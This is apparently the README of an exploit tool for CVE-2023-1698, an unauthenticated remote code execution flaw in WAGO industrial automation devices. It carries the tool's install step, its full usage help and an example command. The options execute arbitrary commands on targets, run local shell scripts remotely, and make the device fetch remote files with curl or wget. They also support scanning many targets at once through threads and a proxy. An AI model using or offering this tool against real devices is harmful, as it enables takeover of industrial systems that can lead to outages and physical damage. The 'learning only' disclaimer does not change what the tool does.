## https://sploitus.com/exploit?id=C9BCAC34-1AFA-5B59-B822-37C1DABE25F6
# WAGO-CVE-2023-1698
## Attention
I have developed a tool for local testing and POC development, which is for technical learning reference only. Please do not use it for illegal purposes. Any direct or indirect consequences and losses caused by individuals or organizations using the information provided in this article are the responsibility of the user themselves and have nothing to do with the author!!!
## Description
WAGO is a company specializing in electrical interconnection, automation, and interface electronics. In multiple WAGO products, a vulnerability allows unauthenticated remote attackers to create new users and change device configurations, which may lead to remote code execution (RCE), denial of service, and damage to the entire system.
## Installation
> pip install -r requirements.txt
## Tools Usage
```
python "WAGO-CVE-2023-1698 .py" -h
usage: WAGO-CVE-2023-1698 .py [-h] (-u URL | -f FILE)
                              [--remote-file-include REMOTE_FILE_INCLUDE | --local-file-include LOCAL_FILE_INCLUDE | --remote-command REMOTE_COMMAND]
                              [--random-agent RANDOM_AGENT] [-d DELAY] [-t THREAD] [--proxy PROXY] [--type TYPE] [-o OUTPUT]

WAGO System Remote Code Execution Vulnerability (CVE-2023-1698)

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Enter target object
  -f FILE, --file FILE  Input target object file
  --remote-file-include REMOTE_FILE_INCLUDE
                        Enter the filepath(it must be On the public network)
  --local-file-include LOCAL_FILE_INCLUDE
                        Enter the filepath(it must be On the local)
  --remote-command REMOTE_COMMAND
                        Enter the command you want to execute
  --random-agent RANDOM_AGENT
                        Using random user agents
  -d DELAY, --delay DELAY
                        Set multi threaded access latency (setting range from 0 to 5)
  -t THREAD, --thread THREAD
                        Set the number of program threads (setting range from 1 to 50)
  --proxy PROXY         Set up the proxy
  --type TYPE           Set up the remote upload file type
  -o OUTPUT, --output OUTPUT
                        output filename
```
## Params
> --remote-file-include: Specify a remote file URL; the file is uploaded to the tmp directory or the current directory through curl or wget.

> --local-file-include: Parse a local shell script file and execute it remotely.

> --remote-command REMOTE: Execute a system command.
## Example
>python wago.py -u ** --proxy --remote-command "cat /var/log/wago"